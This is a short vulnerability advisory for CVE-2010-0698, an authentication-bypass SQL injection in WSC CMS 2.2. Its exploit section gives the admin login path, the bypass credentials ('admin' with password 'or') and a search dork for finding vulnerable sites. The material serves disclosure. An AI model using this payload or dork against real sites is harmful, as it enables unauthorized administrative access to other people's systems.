Topic : | WSC CMS (Bypass) SQL Injection Vulnerability
|
SecurityAlert : 7045
CVE : CVE-2010-0698
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Phenom
Published : 26.02.2010
Affected Software : | dynamicsoft:wsc_cms:2.2 |
 Advisory Content : # Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
# Date: 2010-02-19
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :
------------------------------------------------------
------------------------------------------------------
_____ _
| __ \| |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### WSC CMS (Bypass) SQL Injection Vulnerability
###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
####### Exploit
#############################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
#############################################################
References :
http://xforce.iss.net/xforce/xfdb/56406
http://www.securityfocus.com/bid/38335
http://www.exploit-db.com/exploits/11507
http://secunia.com/advisories/38698
http://packetstormsecurity.org/1002-exploits/wsccms-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|